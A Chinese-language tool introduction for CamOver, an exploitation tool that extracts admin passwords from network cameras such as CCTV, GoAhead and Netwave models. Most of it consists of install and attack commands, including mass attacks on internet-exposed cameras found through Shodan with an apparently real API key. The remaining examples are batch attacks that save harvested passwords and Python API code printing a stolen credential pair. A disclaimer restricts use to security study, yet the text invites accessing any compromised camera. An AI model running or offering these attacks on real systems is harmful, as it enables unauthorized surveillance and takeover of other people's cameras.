声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

关于 CamOver

CamOver 是一款功能强大的摄像头漏洞利用工具,在该工具的帮助下,广大研究人员可以轻松破解掉你家网络摄像头的管理员密码,并接管你的摄像头。

功能特性

  • 该工具能够发现并利用大多数主流型号网络摄像头中的安全漏洞,例如 CCTV、GoAhead 和 Netwave 等。
  • 经过优化,支持多线程同时攻击多个摄像头。
  • 简单的命令行接口和 API 用法。

工具安装

由于 CamOver 使用 Python3 开发,因此首先需要在本地设备上安装并配置好 Python3 环境。接下来,广大研究人员可以使用下列命令下载并安装 CamOver:

1
pip3 install git+https://github.com/EntySec/CamOver

基础使用

CamOver 的使用非常简单,我们只需要在命令行终端中输入 camover 命令即可使用 CamOver:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root💀kali)-[~]
└─# camover -h
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]

CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

optional arguments:
-h, --help show this help message and exit
-t, --threads Use threads for fastest work.
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.

工具使用样例

攻击单个摄像头

下列命令可以攻击单个网络摄像头:

1
camover -a 79.xxx.xxx.237:1400

image-20210803224726544

通过网络攻击远程摄像头

接下来,我们可以使用 Shodan 搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用 -t 参数来设置多线程数量以获得更好的性能:

1
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

image-20210803224503948

随便挑一个访问:

image-20210803220054569

从输入文件获取目标摄像头

我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用 -t 参数来设置多线程数量以获得更好的性能:

1
camover -t -i cameras.txt -o passwords.txt

此命令将会攻击 cameras.txt 中给出的所有摄像头,并会将所有获取到的密码存储至 passwords.txt 文件中。

API 使用

CamOver 还提供了自己的 Python API,可以将其导入至你们自己的项目代码中并调用其功能:

1
from camover import CamOver

调用样例

攻击单个摄像头:

1
2
3
4
5
6
7
from camover import CamOver

camover = CamOver()
creds = camover.exploit('79.xxx.xxx.237:1400')

print(creds)
# 输出: ('admin', 'gzmudzka')